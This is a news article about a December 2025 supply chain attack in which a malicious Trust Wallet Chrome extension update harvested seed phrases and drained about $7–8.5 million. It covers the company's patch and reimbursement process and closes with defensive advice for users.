Trust Wallet Chrome Extension Hack Drains Millions in Crypto – Sophisticated Supply Chain Attack Exposed

A severe security breach struck users of the Trust Wallet Chrome browser extension, resulting in the theft of millions of dollars worth of cryptocurrency after a malicious version of the extension was published to the Chrome Web Store. Threat actors hijacked the wallet’s release process to push a compromised update (version 2.68) between December 24–26, secretly harvesting users’ sensitive wallet data and draining assets without user consent. This incident has sent shockwaves through the cryptocurrency community and highlights ongoing risks with browser-based wallets and software supply chain attacks.

In response, Trust Wallet has released a patched version (2.69), paused risky API keys, and launched a reimbursement/verification process to help victims recover their lost funds. At the same time, analysts are cautioning users about browser extension threats and urging stronger security practices for managing crypto assets.

What Happened With Trust Wallet Extension

The incident centered on the Trust Wallet Chrome browser extension, a popular tool used by many cryptocurrency holders to manage digital assets directly in the web browser. On December 24, 2025, users began receiving an update to version 2.68 that appeared legitimate but contained malicious code.

Instead of performing standard wallet functions, the compromised code was designed to capture wallet mnemonic phrases and private key material when users unlocked their wallets or entered seed phrases. This data was then transmitted to a malicious backend server controlled by the attacker at a domain such as metrics-trustwallet[.]com, allowing them to recreate and control victims’ wallets.

The breach primarily affected users who logged into the extension or unlocked their wallets using version 2.68 before Trust Wallet identified and patched the issue. Mobile app users and other versions of the wallet were reportedly unaffected.

How Much Was Stolen — Impact on Users

Initial estimates from blockchain forensic analysts suggested that around $7 million in cryptocurrency was stolen in the attack.

However, updated figures indicate that as many as 2,520 wallet addresses — tied to roughly $8.5 million in crypto assets — were impacted by the breach. These assets spanned major blockchains, including Bitcoin (BTC), Ethereum (ETH), Solana (SOL), and others.

Fund movements on-chain showed the stolen crypto being rapidly transferred to addresses under the hacker’s control and, in some cases, routed through centralized exchanges and cross-chain bridges — a common tactic to obfuscate the trail.

Overall, hundreds to thousands of users reported unauthorized withdrawals from wallets managed by the compromised extension, often with no additional user interaction required.

How the Attack Worked: Supply Chain Compromise

The root cause of the breach was not a simple vulnerability in the extension code but a supply chain compromise that allowed attackers to publish a malicious build to the official Chrome Web Store:

Leaked Developer Secrets

Investigators have tied the attack to a broader software supply chain outbreak known as Shai-Hulud (or Sha1-Hulud) — a malicious worm-like campaign that has been targeting open-source tooling and developer environments throughout late 2025.

According to Trust Wallet’s post-mortem, developer GitHub secrets were exposed in this ecosystem compromise, giving the attacker access to internal source code and — critically — the Chrome Web Store (CWS) API key. This key enabled them to publish builds outside Trust Wallet’s normal internal release process, bypassing manual review and security checks.

Malicious Update Deployment

With CWS API access and the wallet’s source code, the attacker prepared a modified version of the extension that included the backdoor for harvesting seed phrases. Because it was signed and published via the legitimate Chrome Web Store channel, it passed superficial validation and was automatically delivered to users who had auto-updates enabled.

Data Harvesting Mechanism

Once installed, the backdoor acted stealthily:

• The malicious code triggered when users unlock their wallet or enter seed phrases — not just when importing a wallet.
• It collected mnemonic phrases for all wallets configured in the extension, even dormant ones.
• Collected data was sent to a remote server, after which attackers used it to restore wallets and sign unauthorized transactions.

Because Chrome extensions operate with broad privileges, this backdoor had direct access to sensitive wallet data without requiring users to accept suspicious permissions.

Response From Trust Wallet and Binance

Trust Wallet quickly responded to the incident:

Patch and Update

• On December 25, 2025, the company released a fixed version (2.69) of the extension to remove the malicious code and close the breach window.
• Users were strongly urged to disable version 2.68 immediately and update only through the official Chrome Web Store to prevent further exploitation.

Reimbursement and Verification

Trust Wallet launched an official reimbursement process where victims can submit claims through a support portal. Because of an influx of nearly 5,000 claims — including potential duplicates or exaggerated submissions — the company implemented a wallet verification phase to ensure payouts go to legitimate victims.

So far, Trust Wallet has identified 2,596 compromised wallet addresses but continues to vet claims carefully to reduce fraud and ensure accuracy before issuing reimbursements.

Public Assurance From Binance Leadership

Changpeng Zhao (CZ), co-founder of Binance — the company historically associated with Trust Wallet — publicly confirmed that affected users will be reimbursed and assured the community that “user funds are SAFU (Secure Asset Fund for Users)” during a related incident update.

The security team also emphasised that only the Chrome extension was impacted — mobile and other desktop versions were unaffected.

Scope and Affected Crypto

The total value of stolen assets involved:

• Bitcoin (BTC)
• Ethereum (ETH)
• Solana (SOL)
• BNB Chain assets
• Other major tokens stored in the compromised wallets

While the initial round of reporting pointed to ~$7M losses, recent forensics suggest the actual total may approach ~$8.5M — especially once connected addresses and laundering routes are fully mapped.

Broader Security Implications

This incident is a stark reminder of the risks inherent to browser-based wallet extensions, particularly when tied to large amounts of digital assets and highly automated publishing pipelines:

Supply Chain Risks

Software supply chain attacks — where attackers infiltrate development tools, repositories, or CI/CD pipelines to introduce malicious code — remain among the most dangerous threats because the malicious code appears legitimate and inherits trust from the original software.

Need for Strong Secret Management

The exploitation of exposed GitHub secrets underlines the importance of secure credential storage, secret rotation, and robust access control for development processes, especially in teams managing critical financial tooling.

Elevated Privilege of Browser Extensions

Chrome extensions can access browser APIs that are powerful by design — which makes them useful but also risky if compromised. As this breach shows, even users who do not actively authorize suspicious apps can be harmed if malicious code is distributed through a trusted update channel.

What Users Should Do Now

If you use the Trust Wallet Chrome extension or similar browser wallets:

✔ Disable the Affected Extension Immediately

Check your installed version and uninstall or disable version 2.68. This stops the malicious code from executing further.

✔ Update Only from Official Sources

After disabling, install the patched version (2.69) only through the Chrome Web Store to ensure integrity.

✔ Move Assets to New Secure Wallets

For any wallet accessed during the breach window, transfer funds to a new wallet with a fresh seed phrase you have never entered into an extension.

✔ Be Skeptical of Links and External Messages

Watch for phishing and fake support threads that could try to exploit victims again — especially after major breaches.

Lessons for the Crypto Ecosystem

The Trust Wallet Chrome extension hack is a critical case study in the evolving threat landscape for decentralized finance and crypto utilities:

• Supply chain defenses must evolve to protect against sophisticated build/publishing compromises.
• Secret management and access controls are vital to prevent unauthorized code releases.
• Browser extensions with sensitive privileges require higher security standards than general-purpose apps.

For users and developers alike, this incident underscores that even reputed tools can be attacked — and that vigilance, layered security, and rapid response capabilities are essential in the era of blockchain and Web3 technology.